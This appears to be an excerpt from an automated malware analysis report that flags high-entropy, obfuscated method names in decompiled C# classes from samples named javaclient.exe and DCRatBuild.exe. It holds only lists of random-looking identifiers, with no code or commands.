              Source: javaclient.exe.0.dr, 3z47e5yEjIaC9B1hDFt6A9GQj3CJfYkuSeX7YESjPnVRjJ5Lso5r5fInPHg76SuXxJGGfH.cs	High entropy of concatenated method names: '_044ZGqcxT8DbFFMXqJkcBsWrmeW91hwrUniADcIISPZlc7Kc8ZoJVjy5ao8pik7ODnCwPi', 'kawteYpuc2jo9rVLaJ9fmx70APVCd4JcIIbV1Ey4JvbzJ1LRH0ALYXkzP8mcp45v28krOv', 'pWXwIHYd2f2gwi7LHxDSnEcNWD4cJHWkTVBNxbH0MvtzG3tNTqdC6kiDF3fTtULVaVDgEm', 'qy7pBgaPYi3jKms2AVsYWvs3e26X7TZZ98YUqprnrhFouY3hQlOFxnwmyIsFBGTZU9rjFt', 'C2hHtHcUQ6K4uQA', 'bRiIfCm3HLhGzzR', 'AgDZT3UxuB1fpvt', 'vcnAbAZi2SHGSWE', 'irmtPOmPRnYeGwn', 'gzpzPrTJuoTUCbt'
              Source: javaclient.exe.0.dr, Xy6KZgd0DSmU2NM9zvDSxkdHCTCy6myCJgvl3v.cs	High entropy of concatenated method names: 'h01TyDQuQg0sopOjh1fD9JFutvfb35wzIUrSZy', 'cjcACayLYhSZTnKJVdmOpciYCtfrIjhz5q8jIH', 'Z5XLfWxTOk0hRysOCkjDig957yvDewwTuxYiFU', '_8AQfKPx4T1BaADZIwn8eZ1Wn9MHHNlBdEGDgEO', 'AlQAopl4PqMy6dHZBKSc4R9DXHLjIr', 'iaqTG8cCAV4G9aoj3v4cZyIj3Gx69W', 's1ECtgGv8xOexAl8lLZqGAQpIOpPFR', 'ur0HKTUP9CniK8D6KwRtL7JFsmYt6A', 'ttaEGBQtcuHNVUmjuch3cpsVV9mCVL', '_9cJ7E1WD0g6iix59IFZ51htZXvtBEG'
              Source: javaclient.exe.0.dr, StlEUbFdJZHX9iqp9y0vGOLHru7O9CqwhAtkNxmmtIzacgnk1V1a8HJAfPU1Th8PIJHJOg.cs	High entropy of concatenated method names: 'H67aMUcHuCg4AhoV8qy2gIgsBThuUcYAIwPdcKuztlTNgVX3DCKJwhgMRhH3nGFL5VEexL', 'RmQvvqYcwrJRodw', 'XfhL3OcyoXwYM7n', 'CLaJmNAK9FFFmaK', 'HJbhQ9nIWbph7g9'
              Source: javaclient.exe.0.dr, mRMv10HbZpwLFNjCwmoHBKxrw0NcMSjvzittQ7G5wQNBNo8SaleZ11W6JDVJ762DAuQ5l0.cs	High entropy of concatenated method names: 'm1bDiEvR7Ay1xUgeZ9RVgMbJJYDDdrBfK0bMTbToGG7wIb2AO754qcHSyRT7pjV3iHl9Gw', 'zROi1IUFG39kLKS346keCec3WNF5wxrIgiZbYsl4iifpap0aMTShChJaCGuUsLPv9uungS', 'oLanrHuEYkC1XGREVY3SKaCYO8kYXgP7PHJk1V85cJjulZZwnaSWnekPLgbNGyLyyAvrY7', '_7SuoHKPPyvkl09LyD09z6d5tGj7VNF1ZLEkPFebWBBn4XEOgS5QUVV3tSDU4gHh4GXjVst', '_7vFRD7qVbBd8jrZQluQrd0RX9Cdn4aqhZBi5EywSZ3TOpBgahGGVXRltfEmJickWsyT9iJ', '_9Km99rF3MGgGTpzBTQglb1Ek6CGKzVCNY2ievBcHDFHwvBhaKMTqA2L2k59Bl2m91qgJeb', 'Z2gyLsYN3BSCoz1eaGAoe7HL3U1xeVeHVOyTCp4pnLSaqsKmY5isRLE8EEL4VdANL6hmrH', 'FL20hImHcDxvX3ZO0fZKNqk9fJEstYsJR6fzsFSg9cdhEaN3eOt9zNiFxxFL00ifGwLMAs', '_2r07m8pRSIUOzu15Vl8uXiv9VXbudMH01MFEiVL36ERNSKos1rq3n5Gfm8nE9CWdhbsiut', 'lH5T0vAUYLGTV0eAIXrDgPbWgizrDDG2Ak0pYjsqPqouZbKXFWigNUAcWOiqYCgLMQJhuo'
              Source: javaclient.exe.0.dr, ZPc799oFDlHD7nzPTpU9mHApETofsGEBQ5rjH5.cs	High entropy of concatenated method names: 'Qwqt6CKGHsy0xdUjvl4XNwimjPFQGWlw41uOpB', 'wBjyZFRZsQyxSErE48dgGHTTGK9c5wNf4wTrck', '_5SXFcdPNcD0DgTBkHIRP97Gbjjf7HzgiP2wDou', 'a9m8QnVdPLo9ZoWgDmvjNIeQBcho5kTuSUQO6W', 'rCzjoXBJsUSdeyQMMpzFFcBzeJ9D7DUic8UWBp', 'B1NYOi67TmcglRqMGtoaDarakbcOEQ8Rx9vthk', 'ZGMR7Fm0Bk3D4Berx6sYNxsvOJ37o0Yk597urs', 'ujkjLzrjSDKSkkMtL2OQsOXJFPaWiSh0nG05d6', '_73s8TRn1x73ZsD1IsjzF1TJ2GRfylO5FOhRtoq', 'QJqx8n3JyKcTgy0xkPcfSD4HB2tnP3tvzebGyP'
              Source: 3.3.DCRatBuild.exe.69ce5b3.0.raw.unpack, tdSiuSDaMjdFhUgObFS.cs	High entropy of concatenated method names: '_7zt', 'CAWgCouuRT', 'FiOgOxJ2Ic', 'hm9gmDRRuk', 'IFTgQATEFT', 'GOqgJBmSRA', 'A2pg9tZUAj', 'sL5A1Tnjpg1I6KAh5in', 'qFLXaQnZwokYb4IMZDT', 'fZUM3JnQMt4eIqbLCE6'
              Source: 3.3.DCRatBuild.exe.69ce5b3.0.raw.unpack, HXrR7qkDf0Fi44gKRJ1.cs	High entropy of concatenated method names: 'e36WodF6qn', 'BomWrZ1cQ6', 'f7kWsm91HQ', 'hU9WNDvEV5', 'gicWn7kr3a', 'GusWEUwNi6', 'VbERsCNEsbVvwLT3E8l', 'nuXd0tNYMynGG8wqfmK', 'PLdKXUNKU71c8nA26UN', 'FynVwTNqk8oApSdk9IO'
              Source: 3.3.DCRatBuild.exe.69ce5b3.0.raw.unpack, sUnRYVCiRw8ZadMnWY.cs	High entropy of concatenated method names: '_52U', 'YZ8', 'M5A', 'G9C', 'eesWWSHL2drSBDxLvHx', 'e5ixO3Hif2IyBL8oXHk', 'lkOLIjHyMND9eVFt8kt', 'yWuxy2HXLqTRVwabTl9', 'icySvEHvFnnujmKhkEp', 'TBl8KRHVnv5cYtsyOA8'
              Source: 3.3.DCRatBuild.exe.69ce5b3.0.raw.unpack, SjZBBJ5sEtuH684DtpW.cs	High entropy of concatenated method names: 'IA46Babn9r', 'CGjf62RqTUdOAnDWAeJ', 'mi7i8JRFJRjjgBOer4s', 'qjWWjdRKw2L8c98uleN', 'sRVND8REEVZMLcZ5AN1', '_1fi', 'nbt5hL8cDK', '_676', 'IG9', 'mdP'
              Source: 3.3.DCRatBuild.exe.69ce5b3.0.raw.unpack, GZZEGKMLLRQu2sDQVI6.cs	High entropy of concatenated method names: 'dXvKkCwReb', 'pgNKlaDXgI', 'od4gx77JRkEwkIYiSxl', 'IuZisN7BgCVVkhfRnYJ', 'cc5v657jQLLp1BWJJpE', 'ShK5Vq7Zlj9nyhh257i', 'rZ7Eoa7ncoa1UKi9sb1', 'ElUsZO7YAVNsWOK9rTf', 'eZo7tT7K2mE1s6QfHoM', 'o6447F7E2i6FZmUM5PF'
              Source: 3.3.DCRatBuild.exe.69ce5b3.0.raw.unpack, riAopur7oofVq4YBIsv.cs	High entropy of concatenated method names: 'fcvX5IbfyE', 'dPIX62rJPJ', 'F8e', 'bLw', 'U96', '_71a', 'O52', 'RwsX0vKd1B', '_5f9', 'A6Y'
              Source: 3.3.DCRatBuild.exe.69ce5b3.0.raw.unpack, U6p1FPktFl1cR68DAXN.cs	High entropy of concatenated method names: 'oYo', '_1Z5', 'MnuGbGZN2g', 'zFFiKA9VAS', 'CdoGTDWYvq', 'LIB7tKZG67C8qLAqHry', 'PyrMX0Z0rhY2OHO3sci', 'bpRZqkZ7Jt0eZ84UlL5', 'FtK96aZlo04C5lWhAXC', 's5odbAZwnSQGilF4fW1'
              Source: 3.3.DCRatBuild.exe.69ce5b3.0.raw.unpack, SYyIg6MMNfhQnewQRgt.cs	High entropy of concatenated method names: 'ChaGEenalh', 'IGfGqgsEik', 'GOhGpxWWxI', 'lrMGhCwdhd', 'mL6GAQcDvv', 'LXuGM7npwF', 'yBQbU7cW7gb19veHuMy', 'Q9ZjFAcUaZu3FVR8NS7', 'bFcvYDclh6Gd6gqWl03', 'zFVhk0cwixSqsAMBih0'
              Source: 3.3.DCRatBuild.exe.69ce5b3.0.raw.unpack, hymEolDmJCDvG7pXDtp.cs	High entropy of concatenated method names: 'tSeltxcyPc', 'i9AlDhqPgR', 'CFMlccHFFv', 'lvOlPgEFn2', 'rmBlBYU1F5', 'DSAlZSvLAu', 'TQWl4s3XpV', 'yo1lVo9PqV', 'GcCloWPGvP', 'Nghlrtd830'
              Source: 3.3.DCRatBuild.exe.69ce5b3.0.raw.unpack, hUcm6qDlM5iRY6t5U0Z.cs	High entropy of concatenated method names: 'uxk', 'q7W', '_327', '_958', '_4Oz', 'r6z', 'r7o', 'Z83', 'L5N', 'VTw'
              Source: 3.3.DCRatBuild.exe.69ce5b3.0.raw.unpack, C1tlcgkbm50McP14eAR.cs	High entropy of concatenated method names: 'ydARA5iYeC', 'Kb9RMriUZL', 'oh9R1jrJDq', 'dgIRIU0ucH', 'opBRaryXXg', 'sORh249Iey3O5e47ZWF', 'yypsmX942W1Rbx2TpMD', 'flMnAN9fRBiVxDl4rYZ', 'r27pT79HnGWKaWlDLsQ', 'rOurow96L6fan0k31ZP'
              Source: 3.3.DCRatBuild.exe.69ce5b3.0.raw.unpack, CRcZ1XDiyfXWALjR5J3.cs	High entropy of concatenated method names: 'wZZk20uRwD', 'Bi2kDRvQ77', 'LS3kcPYUjS', 'NlZkPsUJxD', 'c8okB4B5sP', 'RjjcaWYNin3kNQ76EbC', 'xRdE4rYWxavD8pE5xhl', 'jgUo1QYUnLPIeTWuND3', 'qSm2jBYxQNuH8KdqAtX', 'Y9TSfkYQX0VKtd7AHiF'
              Source: 3.3.DCRatBuild.exe.69ce5b3.0.raw.unpack, iu9NfPXI5EJAe19Mmf9.cs	High entropy of concatenated method names: '_625', 'YZ8', '_9pX', 'G9C', 'jJuMMx3QthFpeh7OpUV', 'KO5R6v39bTLoqYh5Tgv', 'OwGwHB3jxGX6bfPokwO', 'LXHqtN3ZWI1luEvvpGM', 'GyvG0X3JeAxc3cAZfCu', 'PCfRLs3B0uFF6nfCAhn'
              Source: 3.3.DCRatBuild.exe.69ce5b3.0.raw.unpack, DT03pUXYIEy4GFhTafP.cs	High entropy of concatenated method names: 'UCsS0lJoXU', 'p0Kolg6WpotpXc8DdEP', 'es9Qp46UQSUr80kfIAa', 'x1xiag6l0LE6lRmCCB6', 'BdF3Fi6wlEVGSDqiguV', 'jAXDsY6NVnZyGW3n77E', 'C2yeEB6x4TTtA2WjQkc', 'ryB5Rq6QJ8diqkmNdec', 'C0xyLY699en6BGrnnVo', 'f28'
              Source: 3.3.DCRatBuild.exe.69ce5b3.0.raw.unpack, yIhTZoX797Z8Liv5h9K.cs	High entropy of concatenated method names: 'yAyGJjBb8c', 'slXG9ROQqC', 'EqgGYgqMi5', 'dFw2Qe13iEn4Vk5pDy8', 'AHmTU01PYkgFWoBNYEQ', 'VsvjVx1MQm0meWTQ1mW', 'A3avUQ11YvTE0ld3bdt', 'gJjDu41cU0BcFBuYXcM', 'gsueuR1GiU5mPvpWXtX', 'ylY4cn10rtoxmrNmxdP'
              Source: 3.3.DCRatBuild.exe.69ce5b3.0.raw.unpack, vOUSlNrluZFMtRC00b1.cs	High entropy of concatenated method names: 'JUUYOvFZZT', 'Mv2YmVcCp8', 'dZ6gBbTLh4nWhd37bkw', 'Mx1vSCTiPLlt6PTPt2E', 'qDetnYTyEC91haLh9vQ', 'eBVL4XTXM2MVgVHjYaK', 'EVMEpTTv7Jvr4TyomEc', 'KpjBgSTVwbd8WFo04HE', 'jE7O2ETzfVjGu8JXRVb', 'sFuUIer5SZB3Sh8m0er'
              Source: 3.3.DCRatBuild.exe.69ce5b3.0.raw.unpack, U5c5ALXZYnNckYqevqc.cs	High entropy of concatenated method names: '_7v4', 'YZ8', '_888', 'G9C', 'f09U5t3ARcqrBrpVEYD', 'ct2y2e3dnrycLrh6NaX', 'MobS5m38985beDy6WNj', 'nUebAf3oHQ1O4dk9Q5g', 'IgQk6P3TKMToUJ8Bvwc', 'NhSq7Y3rEjOFCh1y78t'
              Source: 3.3.DCRatBuild.exe.69ce5b3.0.raw.unpack, vdTvwykPKYw0ihdLp6t.cs	High entropy of concatenated method names: '_525', 'L97', '_3t2', 'UL2', '_6V2', '_968', 'BL6EZHjGgpFPFb4Ba8m', 's9EZ0hj0QajvLceDhuS', 'Vexvujj7qbyaXMsTmO4', 'sghfZnjleEPGRHdp6XX'
              Source: 3.3.DCRatBuild.exe.69ce5b3.0.raw.unpack, lw6lLjDnqcnsu0RQKqd.cs	High entropy of concatenated method names: 'A9Ug2VnJNn', 'VyWgDjqVxr', 'A5IgcGped8', 'MqDgP0KB6M', 'tVogB3VWXJ', 'sQGu0wnoFcft6FDgbmy', 'DgbTtOnTIYbnD6NAlHx', 'GHxGkundYyImpZjeTRF', 'EyaAW5n8vjXRJIHJva0', 'Vvq9H2nr91VqCaFAZ7K'
              Source: 3.3.DCRatBuild.exe.69ce5b3.0.raw.unpack, dCZaLq43G3e24QElXD.cs	High entropy of concatenated method names: 'b46ktZGAb', 'wEh37mdV7G1b3Ty191', 'bpD0iLFC6srr6It8Fv', 'Hc0SeaA8MeosNT4BEG', 'FIC7WK8uHTMRQ7cGdV', 'if8UxGoUV0YV12SyjV', 'j9qG87eYB', 'ArBbV4pN6', 'aiIKePb3Q', 'HlRwVPGL8'
              Source: 3.3.DCRatBuild.exe.69ce5b3.0.raw.unpack, ReUYoKOQ56dexA6oG2.cs	High entropy of concatenated method names: 'g25', 'YZ8', '_23T', 'G9C', 'PxvrgccYH', 'HtsxvUmo6TAc1LJfgeC', 'Iy6jE6mTfsOv2TjK85C', 'bNa8QAmrQT9xdubb5IE', 'o2OEbcm2EccEYIJF5rw', 'wm0Z9UmDd53SVv7WMBf'
              Source: 3.3.DCRatBuild.exe.69ce5b3.0.raw.unpack, rjYXO1Xt7HXwh5cqqeY.cs	High entropy of concatenated method names: 'ISXGfM30dj', 'ig7GxKgUWP', 'BTHY9D31unHeMETIVYy', 'Rv2wEv3MFNm2vht8Rhx', 'Bu4vku33rAc7ilEbglB', 'QP8POI3cFFO0iJjgad2', 'TTkOmr3GXmfMNARc7Sn', 'KGtf0r305nG4V02Y8y4', 'uWLtBp37k5pvKaM5B8x', 'F7xfN03l6oQwAU1fbGL'
              Source: 3.3.DCRatBuild.exe.69ce5b3.0.raw.unpack, tp1VHAMlJ4NNAG3oSlG.cs	High entropy of concatenated method names: 'WFHbdbLjpw', 'QL6b2NnYqJ', 'YrUbDB5aF3', 'f2nbcdiIwx', 'WlgbPfWREI', 'qRLbBdrsuJ', 'E9sbZudlWA', 'JVjE3XGJZMAg4vUEoRy', 'UonqBHGj4hOMf2TWXSo', 'd7fFGGGZQGlMg2KjGk9'
              Source: 3.3.DCRatBuild.exe.69ce5b3.0.raw.unpack, en8I1MJvnXbnluCgtB.cs	High entropy of concatenated method names: 'YxVYVlySR', 'wqFX7fO2n', 'VxIHFt53R', 'XWvuTJWjp', 'KQh5QMAxv', 'xIs6k5POS', 'ccr0QPoel', 'Io8yeta66LwTteBFGJA', 'kc8KvLaPo5ZaH9HU3K6', 'e9iqfkaMYCs4nO9wBIu'
              Source: 3.3.DCRatBuild.exe.69ce5b3.0.raw.unpack, LF8f8kDR88y5ca079GD.cs	High entropy of concatenated method names: 'P29', '_3xW', 'bOP', 'Th1', '_36d', 'vdVlyIcO6a', 'lfulUeauR7', 'r8j', 'LS1', '_55S'
              Source: 3.3.DCRatBuild.exe.69ce5b3.0.raw.unpack, qPskceXmrixwxJjbNGH.cs	High entropy of concatenated method names: '_589', 'YZ8', '_491', 'G9C', 'V8I6VE3g1nJXMXDcnab', 'Pwv28P3SmEN7Hpe8xd2', 'A1V5Zj3sh0NcUtkf8Ky', 'sAioci3eYcfSWALgDpY', 'wdAlBR3LdmOHgfKWHd2', 'ULvxqa3iPo8yCLoRaue'
              Source: 3.3.DCRatBuild.exe.69ce5b3.0.raw.unpack, NnXO6EXSUsBwIS3XxOE.cs	High entropy of concatenated method names: 'd43', 'YZ8', 'g67', 'G9C', 'XOqi6p4YECwlVHNubds', 'EK4wOD4Kl5rUTSIgGQY', 'XwqntP4E1GymDI3CP4S', 'iACoWq4q6aseTxUNBDj', 'wim2TV4FXnLEZI3XY95', 'dGo3Cl4A4XhaaCNy4af'
              Source: 3.3.DCRatBuild.exe.69ce5b3.0.raw.unpack, feFamedYfxyCYds7cQ.cs	High entropy of concatenated method names: '_23T', 'YZ8', 'ELp', 'G9C', 'YGTq3mOyXydscR02VlD', 'gIPflmOXChXfUp6tVVi', 'CVYw2ROv76UqDMXA631', 'W4g6IFOVU8d5FlTAg62', 'rk7OCROzAkA4wJxachZ', 'vfBDQof5eAbFUj21ZB2'
              Source: 3.3.DCRatBuild.exe.69ce5b3.0.raw.unpack, qPKTHmm9orwIlGudmS.cs	High entropy of concatenated method names: 'pHw', 'YZ8', 'v2R', 'G9C', 'DCx7QfHKu4OLc8hvDcu', 'Am1lvhHEMyQKo7BGfmu', 'gO8EePHqgeUpMLYbD3M', 'Fu5NCBHFQQf2IwrgMGT', 'bxdi6fHAjWs6x6CX2DN', 'kpvJF9Hd7PKaMdIQkMS'
              Source: 3.3.DCRatBuild.exe.69ce5b3.0.raw.unpack, uJqfieXFIghvENbe8e8.cs	High entropy of concatenated method names: 'k1hSt6VImW', 'LbxfkIMr5yPBEXvTq3B', 'KGmfh9M2u1BmCOxFNKJ', 'J3TngTMoPcWVd1c0b2b', 'YjARhIMTV2f4swVfHRE', 'SU9Ay2MDbqloLpArqb3', '_3Xh', 'YZ8', '_123', 'G9C'
              Source: 3.3.DCRatBuild.exe.69ce5b3.0.raw.unpack, i0puI4Xp3qt6CQH4YxG.cs	High entropy of concatenated method names: 'kNf', 'YZ8', 'U31', 'G9C', 'XL7ghn6o9eIkpdPmGLJ', 'v0sQdR6TqCNlpZr9Jfi', 'GIdZ1s6rP1rPOgBHuCb', 'ptKEBs62Glg12Q3xM4t', 'gcwMsv6DWorrhEDD0gl', 'Hm1hR36tqlxPE4w5YUM'
              Source: 3.3.DCRatBuild.exe.69ce5b3.0.raw.unpack, pD0hMnMaSpk8HN57u9o.cs	High entropy of concatenated method names: 'EH5bzkRYua', 'ImAKTvPwv9', 'Ya7KSGRImM', 'HrrKGVkL3A', 'jOhKbh4LTp', 'AHiKKFGYkL', 'NyZKwA0dxP', 'X4lKebcDoM', 'hrmKWiEOXj', 'nC9KR1LJ0c'
              Source: 3.3.DCRatBuild.exe.69ce5b3.0.raw.unpack, QFLqVS5PaWP8Gb60HvS.cs	High entropy of concatenated method names: 'nFWHOY8XNY', 'BFKHmRdUy7', 'GlGHQ1DogG', 'TVjHJAmFvV', 'QoeH9iyu8y', 'mgo77WtXAN9bVcgEhp9', 'uqcj9ktvwqAhsSWG4JE', 'otnvI9tVpgw23j7PfNs', 'qNm8A4tzebk1QYkMsGQ', 'UY2mfWb5ImtoV79CQ6U'
              Source: 3.3.DCRatBuild.exe.69ce5b3.0.raw.unpack, CKFSINM76vVq76E8chw.cs	High entropy of concatenated method names: 'MmFWXWdXe4', 'MjNYfPUStTvltS2CH7h', 'ttZPBdUCdvsK6S2ZXLk', 'DKSWoLUg9qFlNTkfoXw', 'hGKCBOUsdBMIqCCV0q7', 'yUhw1JUe7Qeesw130x4', 's5eWLvAAsN', 'lekWC1nGwA', 'ekrWOK20C2', 'rF3Wm5xTA9'
              Source: 3.3.DCRatBuild.exe.69ce5b3.0.raw.unpack, obhmbxMd7KOfTiSDKTh.cs	High entropy of concatenated method names: 'yC7eRP6pOU', 'Gg2eF2CB69', 'mC3XkCWilx0KntRqZEW', 'glbhDtWygYUD1NL9Sek', 'jxwGUbWeeQ41otjW3rR', 'mfPXJHWLQOn1PyaPNN8', 'cFMe3GAdE4', 'gpLZx8U5I3ZLubdCC0p', 'LGpo8jUa7DVvvPxIVRm', 'xSl36qWVNR5mue29TaT'
              Source: 3.3.DCRatBuild.exe.69ce5b3.0.raw.unpack, n75vDiDCEN2dLk9ZHh0.cs	High entropy of concatenated method names: 'ICU', 'j9U', 'IBK', '_6qM', 'Amn', 'Mc2', 'og6', 'z6i', '_5G6', 'r11'
              Source: 3.3.DCRatBuild.exe.69ce5b3.0.raw.unpack, oPLvoJrEpe9xPPokXMK.cs	High entropy of concatenated method names: '_14Y', 'b41', 'D7Y', 'xMq', 'i39', '_77u', '_4PG', '_5u8', 'h12', '_2KT'
              Source: 3.3.DCRatBuild.exe.69ce5b3.0.raw.unpack, N0ZL0jrWWfceRYrduTr.cs	High entropy of concatenated method names: 'HpxXKPwCQv', 'OemXw6yjcw', 'LRcXeK6bu6', 'aAWXW9sZ09', 'mEeXR9ORSD', 'HBcXFK4mUP', 'rpBXit76I7', 'zgNXfSxwKR', 'XVbXxjI6Ox', 'iDYXgrcHpq'
              Source: 3.3.DCRatBuild.exe.69ce5b3.0.raw.unpack, frrJupkSmosdxLocHUR.cs	High entropy of concatenated method names: '_223', 'rf8DkkQWGmysf7NdrNi', 'Gy1ECTQUWkoClmjQgwY', 'E7F9OEQNNAFEU0osmYF', 'WPsWaZQxJwTMmwNHk9D', 'avLX0IQQ18byRowSfj3', 'CtgseSQ96PnQjkJeCu0', 'oDUQd6QjVleCqFCJCud', 'sdHlVyQZXiuHuwh1jKu', 'hcHEw2QJ5V5JV22bFIi'
              Source: 3.3.DCRatBuild.exe.69ce5b3.0.raw.unpack, zsJx2m5VH3sr1ufsdeO.cs	High entropy of concatenated method names: 'PJ1', 'jo3', 'fV00FTpAsX', 'ydp0iQBSky', 'A2E0frISXW', 'EC9', '_74a', '_8pl', '_27D', '_524'
              Source: 3.3.DCRatBuild.exe.69ce5b3.0.raw.unpack, cHU5Gukm0GCCGa2f6F7.cs	High entropy of concatenated method names: '_269', '_5E7', 'lEaGrjxerf', 'Mz8', 'XlWG33CjyM', 'LM4cWaZs6SOOT87Fv5J', 'DuXLy6ZeWEwSjpmcdfX', 'UEtRK6ZLDVv2TcBudro', 'V8N2Y8ZiDvMVXWZK63Z', 'p5mVd4ZyW4fmse5dvJB'
              Source: 3.3.DCRatBuild.exe.69ce5b3.0.raw.unpack, NO97mGXPMbHRGZxQaFA.cs	High entropy of concatenated method names: 'gHL', 'YZ8', 'vF9', 'G9C', 'koHYPK6JJMZvepDOGEx', 'Wsamyc6BJMB1ByBQMre', 'zFi7yV6ns0R6WZIBcWv', 'qFcOdH6YBfdWJt7gchD', 'MQKnvg6KZ6nFWd5yvBG', 'lg4CGv6EQRlNEmWDqaA'
              Source: 3.3.DCRatBuild.exe.69ce5b3.0.raw.unpack, a75LDG5iWX2UXuyn4PO.cs	High entropy of concatenated method names: 'D4M', '_4DP', 'HU2', '_4Ke', '_5C9', '_7b1', 'lV5', 'H7p', 'V5L', '_736'
              Source: 3.3.DCRatBuild.exe.69ce5b3.0.raw.unpack, UtIu7cXip8x48vme9aw.cs	High entropy of concatenated method names: 'Ai7', 'YZ8', '_56U', 'G9C', 'p3Udd96Vauibh2sflIe', 'GMDv4s6zn4oxU9omEje', 'MRrSFVP5rIepLmL6IIB', 'PlZwd9PaXgP3dUFGwk2', 'YjpTFTPmgOurWVCupxP', 'DTYs4FPOd3uQtYEPRgV'
              Source: 3.3.DCRatBuild.exe.69ce5b3.0.raw.unpack, RxNhJUX2wVQDPVqKhTB.cs	High entropy of concatenated method names: '_6U6', 'YZ8', '_694', 'G9C', 'gyltxx4NxXMvy0shpqm', 'erxs8T4x1tekLwqR0TP', 'edbmEj4Q6PYpI48u4oE', 'mvobGH49EHcc8YlkSUy', 'ngx8Kr4jmjifbS2ho84', 'lcWFkW4ZkeaXFMaTmUo'
              Source: 3.3.DCRatBuild.exe.69ce5b3.0.raw.unpack, ac7WH95UvuBd3LGJiGL.cs	High entropy of concatenated method names: '_7tu', '_8ge', 'DyU', '_58f', '_254', '_6Q3', '_7f4', 'B3I', '_75k', 'd4G'
              Source: 3.3.DCRatBuild.exe.69ce5b3.0.raw.unpack, MnkY9kXrawIUFk0neBy.csHigh entropy of concatenated method names: 'K55', 'YZ8', '_9yX', 'G9C', 'pa1UBtIpGJJWxQh45ia', 'qtxmEYIhH0Dk6rBWNU4', 'jYNZPTICkbXOYPSZKlb', 'nBhSWiIgt7GThcLJ452', 'OUnkrVISG84FHro0My9', 'LfXcMKIspwA8O5ujmRe'
              Source: 3.3.DCRatBuild.exe.69ce5b3.0.raw.unpack, g9m6KQXbMqnUXlHgurF.csHigh entropy of concatenated method names: 'yiQ', 'YZ8', '_5li', 'G9C', 'vqQ50w6577CLglyqQnm', 'N7TBj26aEOXxuBjYKaK', 'zWxrZj6memAfA7tRQSk', 'oxXloB6O5ApvIwKecPA', 'n3S91p6frX5A8itDh9v', 'QuehVV6HIV2kOOtvcah'
              Source: 3.3.DCRatBuild.exe.69ce5b3.0.raw.unpack, fj489oMfawRYiVEqp9g.csHigh entropy of concatenated method names: 'eoZbI6UFwk', 'Y5qLEv0OHFGsQbfan0K', 'hZ4QoG0fNjeX3bZda72', 'xC9h4I0awK3c4olDM28', 'CwugtT0mjUH8epc1REW', 'pYWEG50HYrHxUmeNAHA', 'FtBg4B0IT4sMMQ4L6nR', 'sbK4BI04iQb02i59Fhh', 'BWYdjK06Du7ghmR2A6r', 'MQ7P8D0PXts1JsePWoH'
              Source: 3.3.DCRatBuild.exe.69ce5b3.0.raw.unpack, qTPb4AXjt1OIWelh5jF.csHigh entropy of concatenated method names: 'I3RSMTPTbN', 'OAyd99MJWV1RSyv5ZYB', 'wnMfVMMB6EpIov1JjNH', 'fCj2qQMjrRgObAy9YqY', 'QN2qclMZ3sFLBZilRFJ', 'VgPYUQMnapn8FVFxNZe', 'QLw', 'YZ8', 'cC5', 'G9C'
              Source: 3.3.DCRatBuild.exe.69ce5b3.0.raw.unpack, mlMyl0kVxeZ8wvyTBpO.csHigh entropy of concatenated method names: '_5u9', 'UWtG1Ud0SF', 'XRmiTCs3lF', 'nunGNP0eJV', 'FuHFZxjXP8tdwmASCl7', 'hXjirSjvQ5cpHcysxEo', 'MHPrqKjVQ2Dl1ve8lYO', 'o23EZkjiZwEnIcmSonr', 'ACbxdFjy2QXeUl8Cqvk', 'ANaiHAjzTVSHTdKhDxj'
              Source: 3.3.DCRatBuild.exe.69ce5b3.0.raw.unpack, UmMYin5p1p0reIKFPZO.csHigh entropy of concatenated method names: 'IGD', 'CV5', 'LWYHYLXcDn', '_3k4', 'elq', 'hlH', 'yc1', 'Y17', '_2QC', 'En1'
              Source: 3.3.DCRatBuild.exe.69ce5b3.0.raw.unpack, osLxLH55SPrmOauDYlb.csHigh entropy of concatenated method names: 'Qkp', '_72e', 'R26', '_7w6', 'Awi', 'n73', 'cek', 'ro1', '_9j4', '_453'
              Source: 3.3.DCRatBuild.exe.69ce5b3.0.raw.unpack, PVStjT4hn5scdS4lfYS.csHigh entropy of concatenated method names: 'zennxapns0kgYECEyXU', 'IDSbeupYd10gm1gHI2H', 'Hdi5GJpJUtZadn3F7Ps', 'kwJqBNpBR3UQM5IjmCn', 'NyNjlWWMpL', 'rXdQbCpq5PDENGbQRfp', 'zY2SfhpF2w6lTfk59cA', 'QtJ0dKpA4yPdMI4orFR', 'HcXBANpde69lcrNrQej', 'RDAjOmp84UZbZexSDNS'
              Source: 3.3.DCRatBuild.exe.69ce5b3.0.raw.unpack, CM4kAN6rt2XyLtJnvw.csHigh entropy of concatenated method names: 'XhhD68my8', 'bTfcdG2kw', 'VCjPOSZbl', 'fIb0XUa2PNKN7n30qdi', 'MjxBECaTZRMmWARPnOu', 'kN2PFsareqCyD1xqQCT', 'rGL3tfaDk5qHTjSjpS9', 'X4h22xatN9drIPERMPs', 'WGliUjabVRkKSAZIFlP', 'aWCcOQau8Q90rVG1kZV'
              Source: 3.3.DCRatBuild.exe.69ce5b3.0.raw.unpack, uoxBGjMjKvrMiFQ2XTW.csHigh entropy of concatenated method names: 'tRpw0fqXCI', 'OktkiswvPjn5Rhp4iL4', 'y3APjGwVmFABZctNXvq', 'Om14wVwy2llYKH7bjbo', 'fX4JwtwXAEEfIqetWVf', 'yUNFVXwzRG7SmHdvGgP', 'TdwS93W5pcam6XKbAkd', 'gnjFvAWaUwjvcrHCkJd', 'UH1v9OWmmWSxuYq1IL9', 'c8aBMTWOZ7W3r4rMgXJ'
              Source: 3.3.DCRatBuild.exe.69ce5b3.0.raw.unpack, AbyF6Y5ccPaRSV6vWJu.csHigh entropy of concatenated method names: 'bHCuFkiX6R', 'olquiexRZV', 'LocufcjKwE', '_3Gf', '_4XH', '_3mv', '_684', '_555', 'Z9E', 'dRouxKu5l7'
              Source: 3.3.DCRatBuild.exe.69ce5b3.0.raw.unpack, TIXglEXlBKhU9Q9nv23.csHigh entropy of concatenated method names: '_3fO', 'YZ8', '_48A', 'G9C', 'cyaYqc44gHmGph6oXwB', 'CMsSf646BQP5OtIVkMi', 'HjklpI4P9hZrdO81ooH', 'nm8Hqg4MEhQU5U840XH', 'Gronp743Jcjgn420asF', 'W13ltG41vFAvB20m1MZ'
              Source: 3.3.DCRatBuild.exe.69ce5b3.0.raw.unpack, dWejQuXfi0XPOmmXSRA.csHigh entropy of concatenated method names: 'rU3', 'YZ8', 'M54', 'G9C', 'IfxUbs4DcXQq4yxvWe7', 'inCr4I4tMuCFpYaPhXn', 'tQ5erm4bSchQIWRfbIo', 'utPMxm4u7Bt1hFgbCeF', 'g25p7R4RCb3TPlwHMEG', 'ODqbiq4kwv9u4GYXrEt'
